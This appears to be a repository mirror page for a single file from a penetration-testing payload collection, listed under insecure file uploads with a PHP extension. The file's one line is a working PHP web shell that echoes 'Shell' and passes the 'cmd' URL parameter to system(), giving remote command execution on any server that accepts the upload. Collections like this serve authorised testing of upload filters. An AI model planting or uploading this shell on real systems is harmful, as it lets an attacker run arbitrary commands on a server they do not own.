1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-08-26 15:14:32 +02:00
PayloadsAllTheThings/Upload insecure files/PHP Extension/shell.phtml
2018-11-17 14:40:12 +01:00

1 line
43 B
PHTML
Executable File

<?php echo "Shell";system($_GET['cmd']); ?>